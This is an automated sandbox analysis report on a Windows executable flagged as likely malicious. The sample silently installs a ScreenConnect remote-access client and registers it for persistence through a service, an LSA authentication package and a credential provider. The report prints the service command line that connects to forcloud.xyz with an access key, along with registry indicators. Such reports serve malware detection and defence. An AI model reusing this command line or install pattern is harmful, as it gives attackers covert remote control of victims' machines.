Malware Analysis Report

2024-12-07 11:38

Sample ID 241113-vmr13syqhj
Target 5c0bf98f428ac235e9ed18951af08b5da721d7f1074097544ffbc55b9c51d6b3.exe
SHA256 5c0bf98f428ac235e9ed18951af08b5da721d7f1074097544ffbc55b9c51d6b3
Tags
discovery persistence privilege_escalation
score
8/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
8/10

SHA256

5c0bf98f428ac235e9ed18951af08b5da721d7f1074097544ffbc55b9c51d6b3

Threat Level: Likely malicious

The file 5c0bf98f428ac235e9ed18951af08b5da721d7f1074097544ffbc55b9c51d6b3.exe was found to be: Likely malicious.

Malicious Activity Summary

discovery persistence privilege_escalation

Sets service image path in registry

Executes dropped EXE

Event Triggered Execution: Component Object Model Hijacking

Loads dropped DLL

Checks computer location settings

Enumerates connected drives

Boot or Logon Autostart Execution: Authentication Package

Drops file in Windows directory

Drops file in Program Files directory

Enumerates physical storage devices

System Location Discovery: System Language Discovery

Suspicious use of AdjustPrivilegeToken

Modifies registry class

Uses Volume Shadow Copy service COM API

Suspicious use of WriteProcessMemory

Modifies data under HKEY_USERS

Checks SCSI registry key(s)

Suspicious use of FindShellTrayWindow

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-13 17:06

Signatures

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-13 17:06

Reported

2024-11-13 17:09

Platform

win10v2004-20241007-en

Max time kernel

111s

Max time network

140s

Command Line

"C:\Users\Admin\AppData\Local\Temp\5c0bf98f428ac235e9ed18951af08b5da721d7f1074097544ffbc55b9c51d6b3.exe"

Signatures

Sets service image path in registry

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\ScreenConnect Client (20ae101cef0f1acf)\ImagePath = "\"C:\\Program Files (x86)\\ScreenConnect Client (20ae101cef0f1acf)\\ScreenConnect.ClientService.exe\" \"?e=Access&y=Guest&h=forcloud.xyz&p=8041&s=92e7fd01-fc29-45eb-8a0d-d62071f48800&k=BgIAAACkAABSU0ExAAgAAAEAAQChADX0VDCOYpzw3rHL2%2fWsmDfp2rMCOwlBz1eCGgD2Oi1gRuiacwZcRKSZxBYWgdfGxDbYoeGqdwtpMoqlG8JOF4ZKxVYt9zhvvQIB5ire7%2fRFo81g3%2b6hxkPJc0INqs%2bXruwq1z%2b6smxQSCBb%2fykHDHW7AhbHyK65sNB5aK02%2bPswsU904ncQII1vFx60s4CJ8ilr9kIfJWyMgG0RDnaKSCV6gAU5oDSV8wZ3CFUrC2FZNJ8A0Fkfb5xYiK39FBIivzP4vYfAruNnluqWCCrM3hrKooHc9G96dlUI6y4avh5vYzfNXEaIxQvrLqzjTpAdRhiVwzF5SgOywQIOk%2bC5&v=AQAAANCMnd8BFdERjHoAwE%2fCl%2bsBAAAAnoPzfbU0UESngtSsivoO5gAAAAACAAAAAAAQZgAAAAEAACAAAACMXUi7ETvxIB%2bqn0%2f4S0iNfqKstNOmK8Ytl0mIiAc5wAAAAAAOgAAAAAIAACAAAAAWpEL%2bTZN7p2UOT%2fi7hX4VRRV6qFZzedY0sji3HVAdpqAEAAD7aSvNJLP2ZQ6swvThoUS52GUH%2bUF9UIpZPvVglRWbjOXKtq3FqdZ0Qg%2fYtuEDhFLX2yCI4eUVbKjtG%2blhrt9nES5pa5XjHAKqrggXThuZCXqAnZjhJDySakpBIOoeBTCslxvDZBqNsqIVbUl5v%2fFAwPb4TWiThCQF6t1SnE3LDhCKe5ExVTUACx4DBhZpxSnokagxeOXZNY1FU7ymTz8fwOOAWZLQ6Xw%2fvEL6xjsYaWFSeZfrAWsrs8Prs7X005eTmWf77Q%2bTrzY5OA5WG%2fCQrVA%2fmL5l4EYdAyZwZsuD72uWuQGITDKLgegmsXVRmlX%2f9I9dcjcjgi4T5xhzVQH9ca6t%2fGwFRKtuj7RslmhMCEhLTe3%2fXtcsKrLnj0GOsVn0vA9jK4T%2b79nij%2b7Xmou8XaG3G5YGxcSvUbopu11X4Pj3tpgqz3cjY%2fYQAchy5YQFMR3n0ClhsGissNx0sYzpfxhUDOoZpG%2fGUGYnvUrf1UULm4%2fNuuJiV0KOicLLJcqEnKcV1oiR4k6IKgLe%2fu6%2fb%2fE0D%2foeUbzWnVw8f8%2bTe28t5GiIdduZ0TxtpNJObGbo4cYmSQQoskPyv%2fEIbfA2MT2IaRuTDlwQUpWZCv%2bGaOlXeoKXEmXkGHlq%2f6ym2xYBfCDWEPAwStn8vgJQQ0cmZX6xz%2fFSgUcd0NPJCqpp0kFtVvsVwnmHTxv7StgkiL33NYxYQZmjBOF4DcYBaZ8EUDwfk%2b%2f7cWLcUnrBkdeju1voWqaLga%2frU%2foPgW2%2b10aJofoLcwdtHG%2fipG9tA4K1CnfP9Pqm%2bQmtMMWt8g3SWyBRZZjfKiErFi7Q0GN9PQheK9gaMVFlisKGMvLBU4WZXSu7vmIh4kunw3Jj1Dc5WPxmwtUo%2bkcdCAAzFwRjbPHXvAafCeXIQUMdPz5GXQvq6RAXOqJPJuK2fx0M6HtdVwAFuMrEFG4cpgx%2bN6Uawns%2bMftnROnGB9VHr0J%2fcWixSmpfIisvg9BoSq2gT%2b3%2bFLpiN33h6ipP4PGOkCMeA8xVGghaqFtyyeW1BU1zVOZmwaLQ1t42ARQ5EFxbiFOSzrjByEcAD%2fFAPo3IXfE22nv7OaCW2mIjOSbjCycp2EyB1arYek%2bZcZ3nHMX77RKK8ZcTaBDBdVUMYZym7NOkjwUn3jyG2zRzT%2bZPyt0frEOqgjafpgvMJ5RhgjlaRGy%2fOWOMGa%2flgsAS9mxIFdFeR4cQlqfzdbjd%2fc2vJn%2fcikNtbwtt7csWOFpTXeD5s2L%2fZJr2Pd0%2bN12ysbuTkhHkSU78FpB%2fwmzOzFx9DwmSZEMtW%2bJzQCI2VcA%2bbGenbiZhzKtDkNpWLlyqkUkRC5CHoMAUG7M2RX9ZNtZu2ibEqHZ6ib1kgOLVykT3CyatN%2bPvtDRkxgo32Ll994NOA7hmBPmJMydHJKnBTfavNV7yXqG9lj9ClHU4C%2bEsbcrtnDt5wJH9cAzgoNiTWlfC9Z55sn%2bPhwoGxYXna4Uo88%2b0l9hbBKiG0sX87Fs6EQCqdM9cJ8bJQSsji1427sZs%2fJ0%2bapcgu3X1dQPLJJRA%2fZyS930D5qdAd0uRs1DwWtI4JIuLZUAAAAAHwzA80IduPMKF5viypC0RW9XUib4Dgd0qcpeUKvpEMTdH%2b9Y%2b4A5MJC2MH1agmEObt4M0YDlW2%2blt1zwcvvML&t=JacekK&c=PL&c=&c=&c=&c=&c=&c=&c=\"" C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\5c0bf98f428ac235e9ed18951af08b5da721d7f1074097544ffbc55b9c51d6b3.exe N/A

Event Triggered Execution: Component Object Model Hijacking

persistence privilege_escalation

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe N/A
N/A N/A C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe N/A
N/A N/A C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe N/A
N/A N/A C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe N/A
N/A N/A C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe N/A
N/A N/A C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe N/A
N/A N/A C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe N/A
N/A N/A C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe N/A
N/A N/A C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe N/A
N/A N/A C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\T: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\L: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\B: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\J: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\E: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\B: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\J: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\K: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\M: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\O: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\A: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\K: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\O: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\L: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\G: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\I: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\A: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\I: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\M: C:\Windows\system32\msiexec.exe N/A

Boot or Logon Autostart Execution: Authentication Package

persistence privilege_escalation
Description Indicator Process Target
Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\Authentication Packages = 6d007300760031005f003000000043003a005c00500072006f006700720061006d002000460069006c00650073002000280078003800360029005c00530063007200650065006e0043006f006e006e00650063007400200043006c00690065006e00740020002800320030006100650031003000310063006500660030006600310061006300660029005c00530063007200650065006e0043006f006e006e006500630074002e00570069006e0064006f0077007300410075007400680065006e007400690063006100740069006f006e005000610063006b006100670065002e0064006c006c0000000000 C:\Windows\system32\msiexec.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\Client.en-US.resources C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.Client.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.Core.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsAuthenticationPackage.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\system.config C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsBackstageShell.exe C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe.config C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsFileManager.exe C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsCredentialProvider.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsFileManager.exe.config C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\app.config C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\Client.resources C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.Windows.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsBackstageShell.exe.config C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe C:\Windows\system32\msiexec.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Installer\MSIFD1E.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\wix{27FF5BC2-C647-2B99-83BE-DDEA87E94140}.SchedServiceConfig.rmi C:\Windows\syswow64\MsiExec.exe N/A
File created C:\Windows\Installer\e57fbb7.msi C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\{27FF5BC2-C647-2B99-83BE-DDEA87E94140}\DefaultIcon C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\{27FF5BC2-C647-2B99-83BE-DDEA87E94140}\DefaultIcon C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\e57fbb5.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\e57fbb5.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\ C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIFCCF.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI136.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\inprogressinstallinfo.ipi C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\SourceHash{27FF5BC2-C647-2B99-83BE-DDEA87E94140} C:\Windows\system32\msiexec.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\syswow64\MsiExec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\syswow64\MsiExec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\5c0bf98f428ac235e9ed18951af08b5da721d7f1074097544ffbc55b9c51d6b3.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\msiexec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\syswow64\MsiExec.exe N/A

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters C:\Windows\system32\vssvc.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters C:\Windows\system32\vssvc.exe N/A
Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr C:\Windows\system32\vssvc.exe N/A
Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\PartitionTableCache = 00000000040000009fc5eef0dbaffe7c0000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000c01200000000ffffffff0000000027010100000800009fc5eef00000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000d01200000000000020ed3a000000ffffffff0000000007000100006809009fc5eef0000000000000d012000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000f0ff3a0000000000000005000000ffffffff000000000700010000f87f1d9fc5eef0000000000000f0ff3a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff0000000000000000000000009fc5eef000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 C:\Windows\system32\vssvc.exe N/A
Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\SnapshotDataCache = 534e41505041525401000000700000008ec7416a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 C:\Windows\system32\vssvc.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\27 C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\26\52C64B7E C:\Windows\system32\msiexec.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26 C:\Windows\system32\msiexec.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\sc-20ae101cef0f1acf C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\sc-20ae101cef0f1acf\shell\open C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\sc-20ae101cef0f1acf\shell\open\command\ = "\"C:\\Program Files (x86)\\ScreenConnect Client (20ae101cef0f1acf)\\ScreenConnect.WindowsClient.exe\" \"%1\"" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\2CB5FF72746C99B238EBDDAE789E1404 C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\B13434442C21EB3002EA01C1FEF0A1FC\2CB5FF72746C99B238EBDDAE789E1404 C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\2CB5FF72746C99B238EBDDAE789E1404\SourceList\Media\1 = ";" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\sc-20ae101cef0f1acf\shell C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\2CB5FF72746C99B238EBDDAE789E1404 C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\2CB5FF72746C99B238EBDDAE789E1404\AdvertiseFlags = "388" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\2CB5FF72746C99B238EBDDAE789E1404\SourceList C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-A44D-4392D823459F}\ = "ScreenConnect Client (20ae101cef0f1acf) Credential Provider" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\2CB5FF72746C99B238EBDDAE789E1404\Version = "402718729" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\2CB5FF72746C99B238EBDDAE789E1404\ProductIcon = "C:\\Windows\\Installer\\{27FF5BC2-C647-2B99-83BE-DDEA87E94140}\\DefaultIcon" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\2CB5FF72746C99B238EBDDAE789E1404\DeploymentFlags = "3" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\2CB5FF72746C99B238EBDDAE789E1404\SourceList\PackageName = "setup.msi" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\CLSID\{6FF59A85-BC37-4CD4-A44D-4392D823459F} C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\2CB5FF72746C99B238EBDDAE789E1404\PackageCode = "2CB5FF72746C99B238EBDDAE789E1404" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\2CB5FF72746C99B238EBDDAE789E1404\Assignment = "1" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-A44D-4392D823459F}\InprocServer32\ = "C:\\Program Files (x86)\\ScreenConnect Client (20ae101cef0f1acf)\\ScreenConnect.WindowsCredentialProvider.dll" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\2CB5FF72746C99B238EBDDAE789E1404\Language = "1033" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\B13434442C21EB3002EA01C1FEF0A1FC C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\sc-20ae101cef0f1acf\URL Protocol C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\sc-20ae101cef0f1acf\UseOriginalUrlEncoding = "1" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\sc-20ae101cef0f1acf\shell\open\command C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-A44D-4392D823459F}\InprocServer32\ThreadingModel = "Apartment" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\2CB5FF72746C99B238EBDDAE789E1404\InstanceType = "0" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\2CB5FF72746C99B238EBDDAE789E1404\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\AppData\\Local\\Temp\\ScreenConnect\\20ae101cef0f1acf\\" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\CLSID\{6FF59A85-BC37-4CD4-A44D-4392D823459F}\InprocServer32 C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\2CB5FF72746C99B238EBDDAE789E1404\Full C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\2CB5FF72746C99B238EBDDAE789E1404\SourceList\Net\1 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ScreenConnect\\20ae101cef0f1acf\\" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\2CB5FF72746C99B238EBDDAE789E1404\SourceList\Media C:\Windows\system32\msiexec.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\2CB5FF72746C99B238EBDDAE789E1404\Clients = 3a0000000000 C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\sc-20ae101cef0f1acf C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\sc-20ae101cef0f1acf\shell\open\command C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\2CB5FF72746C99B238EBDDAE789E1404\ProductName = "ScreenConnect Client (20ae101cef0f1acf)" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\2CB5FF72746C99B238EBDDAE789E1404\AuthorizedLUAApp = "0" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\2CB5FF72746C99B238EBDDAE789E1404\SourceList\Net C:\Windows\system32\msiexec.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
